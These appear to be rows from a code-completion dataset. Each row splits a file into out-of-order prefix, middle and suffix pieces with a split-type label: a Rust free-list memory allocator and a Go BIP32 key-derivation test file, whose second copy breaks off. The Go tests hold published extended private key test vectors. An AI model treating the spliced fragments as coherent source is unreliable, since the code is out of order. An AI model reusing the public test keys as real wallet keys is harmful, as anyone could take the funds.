let cell = policy.new_cell_for_free_list(size, align)?;
let head = (*cell).insert_into_free_list(head, policy);
alloc_first_fit(size, align, head, policy)
}
/// A n64 allocator.
///
/// # Safety
///
/// When used in unix environments, cannot move in memory. Typically not an
/// issue if you're just using this as a `static` global allocator.
pub struct N64Alloc<'a> {
head: imp::Exclusive<*const FreeCell<'a>>,
size_classes: size_classes::SizeClasses<'a>,
}
unsafe impl<'a> Sync for N64Alloc<'a> {}
impl<'a> ConstInit for N64Alloc<'a> {
const INIT: N64Alloc<'a> = N64Alloc {
head: imp::Exclusive::INIT,
size_classes: size_classes::SizeClasses::INIT,
};
}
impl<'a> N64Alloc<'a> {
/// An initial `const` default construction of a `N64Alloc` allocator.
///
/// This is usable for initializing `static`s that get set as the global
/// allocator.
pub const INIT: Self = <Self as ConstInit>::INIT;
unsafe fn with_free_list_and_policy_for_size<F, T>(&self, size: Words, align: Bytes, f: F) -> T
where
F: for<'b> FnOnce(&'b Cell<*const FreeCell<'a>>, &'b dyn AllocPolicy<'a>) -> T,
|
unsafe fn alloc_impl(&self, layout: Layout) -> Result<NonNull<u8>, AllocErr> {
let size = Bytes(layout.size());
let align = if layout.align() == 0 {
Bytes(1)
} else {
Bytes(layout.align())
};
if size.0 == 0 {
// Ensure that our made up pointer is properly aligned by using the
// alignment as the pointer.
return Ok(NonNull::new_unchecked(align.0 as *mut u8));
}
let word_size: Words = checked_round_up_to(size).ok_or(AllocErr)?;
self.with_free_list_and_policy_for_size(word_size, align, |head, policy| {
alloc_with_refill(word_size, align, head, policy)
})
}
unsafe fn dealloc_impl(&self, ptr: NonNull<u8>, layout: Layout) {
let size = Bytes(layout.size());
if size.0 == 0 {
return;
}
let size: Words = size.round_up_to();
let align = Bytes(layout.align());
self.with_free_list_and_policy_for_size(size, align, |head, policy| {
let cell = (ptr.as_ptr() as *mut CellHeader<'a> as *const CellHeader<'a>).offset(-1);
let cell = &*cell;
let cell: &AllocatedCell<'a> = &*(cell as *const CellHeader as *const AllocatedCell);
let free = cell.as_free_cell(policy);
if policy.should_merge_adjacent_free_cells() {
// Merging with the _previous_ adjacent cell is easy: it is
// already in the free list, so folding this cell into it is all
// that needs to be done. The free list can be left alone.
//
// Merging with the _next_ adjacent cell is a little harder. It
// is already in the free list, but we need to splice it out
// from the free list, since its header will become invalid
// after consolidation, and it is *this* cell's header that
// needs to be in the free list. But we don't have access to the
// pointer pointing to the soon-to-be-invalid header, and
// therefore can't adjust that pointer. So we have a delayed
// consolidation scheme. We insert this cell just after the next
// adjacent cell in the free list, and set the next adjacent
// cell's `NEXT_FREE_CAN_MERGE` bit. The next time that we walk
// the free list for allocation, the bit will be checked and the
// consolidation will happen at that time.
//
// If _both_ the previous and next adjacent cells are free, we
// are faced with a dilemma. We cannot merge all previous,
// current, and next cells together because our singly-linked
// free list doesn't allow for that kind of arbitrary appending
// and splicing. There are a few different kinds of tricks we
// could pull here, but they would increase implementation
// complexity and code size. Instead, we use a heuristic to
// choose whether to merge with the previous or next adjacent
// cell. We could choose to merge with whichever neighbor cell
// is smaller or larger, but we don't. We prefer the previous
// adjacent cell because we can greedily consolidate with it
// immediately, whereas the consolidating with the next adjacent
// cell must be delayed, as explained above.
if let Some(prev) = free
.header
.neighbors
.prev()
.and_then(|p| (*p).as_free_cell())
{
free.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(&free.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev.header.neighbors);
}
return;
}
if let Some(next) = free
.header
.neighbors
.next()
.and_then(|n| (*n).as_free_cell())
{
free.next_free_raw.set(next.next_free());
next.next_free_raw.set(free);
next.set_next_free_can_merge();
return;
}
}
// Either we don't want to merge cells for the current policy, or we
// didn't have the opportunity to do any merging with our adjacent
// neighbors. In either case, push this cell onto the front of the
// free list.
let _head = free.insert_into_free_list(head, policy);
});
}
}
pub static ALLOC_BYTES_LEFT: AtomicI32 = AtomicI32::new(imp::SCRATCH_LEN_BYTES as i32);
pub static ALLOC_BYTES_USED: AtomicI32 = AtomicI32::new(0);
pub use imp::OFFSET as ALLOC_PAGE_OFFSET;
unsafe impl GlobalAlloc for N64Alloc<'static> {
unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
ALLOC_BYTES_LEFT.fetch_sub(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_add(layout.size() as i32, Ordering::SeqCst);
match self.alloc_impl(layout) {
Ok(ptr) => ptr.as_ptr(),
Err(AllocErr) => ptr::null_mut(),
}
}
unsafe fn dealloc(&self, ptr: *mut u8, layout: Layout) {
ALLOC_BYTES_LEFT.fetch_add(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_sub(layout.size() as i32, Ordering::SeqCst);
if let Some(ptr) = NonNull::new(ptr) {
self.dealloc_impl(ptr, layout);
}
}
}
| {
if align <= size_of::<usize>() {
if let Some(head) = self.size_classes.get(size) {
let policy = size_classes::SizeClassAllocPolicy(&self.head);
let policy = &policy as &dyn AllocPolicy<'a>;
return head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
});
}
}
let policy = &LARGE_ALLOC_POLICY as &dyn AllocPolicy<'a>;
self.head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
})
} | identifier_body |
bip32_test.go | package bip32
import (
"encoding/hex"
"testing"
"github.com/stretchr/testify/assert"
)
type testMasterKey struct {
seed string
children []testChildKey
privKey string
pubKey string
}
type testChildKey struct {
pathFragment uint32
privKey string
pubKey string
hexPubKey string
}
func TestBip32TestVectors(t *testing.T) {
hStart := FirstHardenedChild
vector1 := testMasterKey{
seed: "000102030405060708090a0b0c0d0e0f",
privKey: "xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi",
pubKey: "xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8",
children: []testChildKey{
{
pathFragment: hStart,
privKey: "xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7",
pubKey: "xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw",
},
{
pathFragment: 1,
privKey: "xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs",
pubKey: "xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ",
},
{
pathFragment: 2 + hStart,
privKey: "xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM",
pubKey: "xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5",
},
{
pathFragment: 2,
privKey: "xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334",
pubKey: "xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV",
},
{
pathFragment: 1000000000,
privKey: "xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76",
pubKey: "xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy",
},
},
}
vector2 := testMasterKey{
seed: "fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542",
privKey: "xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U",
pubKey: "xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB",
children: []testChildKey{
{
pathFragment: 0,
privKey: "xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt",
pubKey: "xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH",
},
{
pathFragment: 2147483647 + hStart,
privKey: "xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9",
pubKey: "xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a",
},
{
pathFragment: 1, | pathFragment: 2147483646 + hStart,
privKey: "xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc",
pubKey: "xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL",
},
{
pathFragment: 2,
privKey: "xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j",
pubKey: "xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt",
},
},
}
vector3 := testMasterKey{
seed: "4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be",
privKey: "xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6",
pubKey: "xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13",
children: []testChildKey{
{
pathFragment: hStart + 0,
privKey: "xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L",
pubKey: "xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y",
},
},
}
testVectorKeyPairs(t, vector1)
testVectorKeyPairs(t, vector2)
testVectorKeyPairs(t, vector3)
}
func testVectorKeyPairs(t *testing.T, vector testMasterKey) {
// Decode master seed into hex
seed, _ := hex.DecodeString(vector.seed)
// Generate a master private and public key
privKey, err := NewMasterKey(seed)
assert.NoError(t, err)
pubKey := privKey.PublicKey()
assert.Equal(t, vector.privKey, privKey.String())
assert.Equal(t, vector.pubKey, pubKey.String())
// Iterate over the entire child chain and test the given keys
for _, testChildKey := range vector.children {
// Get the private key at the given key tree path
privKey, err = privKey.NewChildKey(testChildKey.pathFragment)
assert.NoError(t, err)
// Get this private key's public key
pubKey = privKey.PublicKey()
// Assert correctness
assert.Equal(t, testChildKey.privKey, privKey.String())
assert.Equal(t, testChildKey.pubKey, pubKey.String())
// Serialize and deserialize both keys and ensure they're the same
assertKeySerialization(t, privKey, testChildKey.privKey)
assertKeySerialization(t, pubKey, testChildKey.pubKey)
}
}
func TestPublicParentPublicChildDerivation(t *testing.T) {
// Generated using https://iancoleman.github.io/bip39/
// Root key:
// xprv9s21ZrQH143K2Cfj4mDZBcEecBmJmawReGwwoAou2zZzG45bM6cFPJSvobVTCB55L6Ld2y8RzC61CpvadeAnhws3CHsMFhNjozBKGNgucYm
// Derivation Path m/44'/60'/0'/0:
// xprv9zy5o7z1GMmYdaeQdmabWFhUf52Ytbpe3G5hduA4SghboqWe7aDGWseN8BJy1GU72wPjkCbBE1hvbXYqpCecAYdaivxjNnBoSNxwYD4wHpW
// xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u
extendedMasterPublic, err := B58Deserialize(
"xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u",
DefaultBip32Version)
assert.NoError(t, err)
expectedChildren := []testChildKey{
{pathFragment: 0, hexPubKey: "0243187e1a2ba9ba824f5f81090650c8f4faa82b7baf93060d10b81f4b705afd46"},
{pathFragment: 1, hexPubKey: "023790d11eb715c4320d8e31fba3a09b700051dc2cdbcce03f44b11c274d1e220b"},
{pathFragment: 2, hexPubKey: "0302c5749c3c75cea234878ae3f4d8f65b75d584bcd7ed0943b016d6f6b59a2bad"},
{pathFragment: 3, hexPubKey: "03f0440c94e5b14ea5b15875934597afff541bec287c6e65dc1102cafc07f69699"},
{pathFragment: 4, hexPubKey: "026419d0d8996707605508ac44c5871edc7fe206a79ef615b74f2eea09c5852e2b"},
{pathFragment: 5, hexPubKey: "02f63c6f195eea98bdb163c4a094260dea71d264b21234bed4df3899236e6c2298"},
{pathFragment: 6, hexPubKey: "02d74709cd522081064858f393d009ead5a0ecd43ede3a1f57befcc942025cb5f9"},
{pathFragment: 7, hexPubKey: "03e54bb92630c943d38bbd8a4a2e65fca7605e672d30a0e545a7198cbb60729ceb"},
{pathFragment: 8, hexPubKey: "027e9d5acd14d39c4938697fba388cd2e8f31fc1c5dc02fafb93a10a280de85199"},
{pathFragment: 9, hexPubKey: "02a167a9f0d57468fb6abf2f3f7967e2cadf574314753a06a9ef29bc76c54638d2"},
{pathFragment: 100, hexPubKey: "020db9ba00ddf68428e3f5bfe54252bbcd75b21e42f51bf3bfc4172bf0e5fa7905"},
{pathFragment: 101, hexPubKey: "0299e3790956570737d6164e6fcda5a3daa304065ca95ba46bc73d436b84f34d46"},
{pathFragment: 102, hexPubKey: "0202e0732c4c5d2b1036af173640e01957998cfd4f9cdaefab6ffe76eb869e2c59"},
{pathFragment: 103, hexPubKey: "03d050adbd996c0c5d737ff638402dfbb8c08e451fef10e6d62fb57887c1ac6cb2"},
{pathFragment: 104, hexPubKey: "038d466399e2d68b4b16043ad4d88893b3b2f84fc443368729a973df1e66f4f530"},
{pathFragment: 105, hexPubKey: "034811e2f0c8c50440c08c2c9799b99c911c036e877e8325386ff61723ae3ffdce"},
{pathFragment: 106, hexPubKey: "026339fd5842921888e711a6ba9104a5f0c94cc0569855273cf5faefdfbcd3cc29"},
{pathFragment: 107, hexPubKey: "02833705c1069fab2aa92c6b0dac27807290d72e9f52378d493ac44849ca003b22"},
{pathFragment: 108, hexPubKey: "032d2639bde1eb7bdf8444bd4f6cc26a9d1bdecd8ea15fac3b992c3da68d9d1df5"},
{pathFragment: 109, hexPubKey: "02479c6d4a64b93a2f4343aa862c938fbc658c99219dd7bebb4830307cbd76c9e9"},
}
for _, child := range expectedChildren {
pubKey, err := extendedMasterPublic.NewChildKey(child.pathFragment)
assert.NoError(t, err)
assert.False(t, pubKey.IsPrivate)
assert.Equal(t, child.hexPubKey, hex.EncodeToString(pubKey.Key))
}
}
func TestNewSeed(t *testing.T) {
for i := 0; i < 20; i++ {
seed, err := NewSeed()
assert.NoError(t, err)
assert.Equal(t, 256, len(seed))
}
}
func TestB58SerializeUnserialize(t *testing.T) {
tests := []struct {
seed []byte
base58 string
}{
{[]byte{}, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsMC"},
{[]byte{1}, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEC"},
{[]byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 0}, "xprv9s21ZrQH143K2hKT3jMKPFEcQLbx2XD55NtqQA7B4C5U9mTZY7gBeCdoFgurN4pxkQshzP8AQhBmUNgAo5djj5FzvUFh5pKH6wcRMSXVuc1"},
}
for _, test := range tests {
key, err := NewMasterKey(test.seed)
assert.NoError(t, err)
assertKeySerialization(t, key, test.base58)
}
}
func TestDeserializingInvalidStrings(t *testing.T) {
tests := []struct {
err error
base58 string
}{
{ErrSerializedKeyWrongSize, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsM"},
{ErrInvalidChecksum, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc"},
}
for _, test := range tests {
_, err := B58Deserialize(test.base58, DefaultBip32Version)
assert.Equal(t, test.err, err)
}
_, err := B58Deserialize("notbase58iiiiiIIIIIbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc",
DefaultBip32Version)
assert.NotNil(t, err)
}
func TestCantCreateHardenedPublicChild(t *testing.T) {
key, err := NewMasterKey([]byte{})
assert.NoError(t, err)
// Test that it works for private keys
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.NoError(t, err)
// Test that it throws an error for public keys if hardened
key = key.PublicKey()
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.Equal(t, ErrHardnedChildPublicKey, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.Equal(t, ErrHardnedChildPublicKey, err)
}
func assertKeySerialization(t *testing.T, key *Key, knownBase58 string) {
serializedBase58 := key.B58Serialize()
assert.Equal(t, knownBase58, serializedBase58)
unserializedBase58, err := B58Deserialize(serializedBase58, DefaultBip32Version)
assert.NoError(t, err)
assert.Equal(t, key, unserializedBase58)
} | privKey: "xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef",
pubKey: "xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon",
},
{ | random_line_split |
bip32_test.go | package bip32
import (
"encoding/hex"
"testing"
"github.com/stretchr/testify/assert"
)
type testMasterKey struct {
seed string
children []testChildKey
privKey string
pubKey string
}
type testChildKey struct {
pathFragment uint32
privKey string
pubKey string
hexPubKey string
}
func TestBip32TestVectors(t *testing.T) {
hStart := FirstHardenedChild
vector1 := testMasterKey{
seed: "000102030405060708090a0b0c0d0e0f",
privKey: "xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi",
pubKey: "xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8",
children: []testChildKey{
{
pathFragment: hStart,
privKey: "xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7",
pubKey: "xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw",
},
{
pathFragment: 1,
privKey: "xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs",
pubKey: "xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ",
},
{
pathFragment: 2 + hStart,
privKey: "xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM",
pubKey: "xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5",
},
{
pathFragment: 2,
privKey: "xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334",
pubKey: "xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV",
},
{
pathFragment: 1000000000,
privKey: "xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76",
pubKey: "xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy",
},
},
}
vector2 := testMasterKey{
seed: "fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542",
privKey: "xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U",
pubKey: "xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB",
children: []testChildKey{
{
pathFragment: 0,
privKey: "xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt",
pubKey: "xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH",
},
{
pathFragment: 2147483647 + hStart,
privKey: "xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9",
pubKey: "xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a",
},
{
pathFragment: 1,
privKey: "xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef",
pubKey: "xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon",
},
{
pathFragment: 2147483646 + hStart,
privKey: "xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc",
pubKey: "xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL",
},
{
pathFragment: 2,
privKey: "xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j",
pubKey: "xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt",
},
},
}
vector3 := testMasterKey{
seed: "4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be",
privKey: "xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6",
pubKey: "xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13",
children: []testChildKey{
{
pathFragment: hStart + 0,
privKey: "xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L",
pubKey: "xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y",
},
},
}
testVectorKeyPairs(t, vector1)
testVectorKeyPairs(t, vector2)
testVectorKeyPairs(t, vector3)
}
func testVectorKeyPairs(t *testing.T, vector testMasterKey) {
// Decode master seed into hex
seed, _ := hex.DecodeString(vector.seed)
// Generate a master private and public key
privKey, err := NewMasterKey(seed)
assert.NoError(t, err)
pubKey := privKey.PublicKey()
assert.Equal(t, vector.privKey, privKey.String())
assert.Equal(t, vector.pubKey, pubKey.String())
// Iterate over the entire child chain and test the given keys
for _, testChildKey := range vector.children {
// Get the private key at the given key tree path
privKey, err = privKey.NewChildKey(testChildKey.pathFragment)
assert.NoError(t, err)
// Get this private key's public key
pubKey = privKey.PublicKey()
// Assert correctness
assert.Equal(t, testChildKey.privKey, privKey.String())
assert.Equal(t, testChildKey.pubKey, pubKey.String())
// Serialize and deserialize both keys and ensure they're the same
assertKeySerialization(t, privKey, testChildKey.privKey)
assertKeySerialization(t, pubKey, testChildKey.pubKey)
}
}
func TestPublicParentPublicChildDerivation(t *testing.T) {
// Generated using https://iancoleman.github.io/bip39/
// Root key:
// xprv9s21ZrQH143K2Cfj4mDZBcEecBmJmawReGwwoAou2zZzG45bM6cFPJSvobVTCB55L6Ld2y8RzC61CpvadeAnhws3CHsMFhNjozBKGNgucYm
// Derivation Path m/44'/60'/0'/0:
// xprv9zy5o7z1GMmYdaeQdmabWFhUf52Ytbpe3G5hduA4SghboqWe7aDGWseN8BJy1GU72wPjkCbBE1hvbXYqpCecAYdaivxjNnBoSNxwYD4wHpW
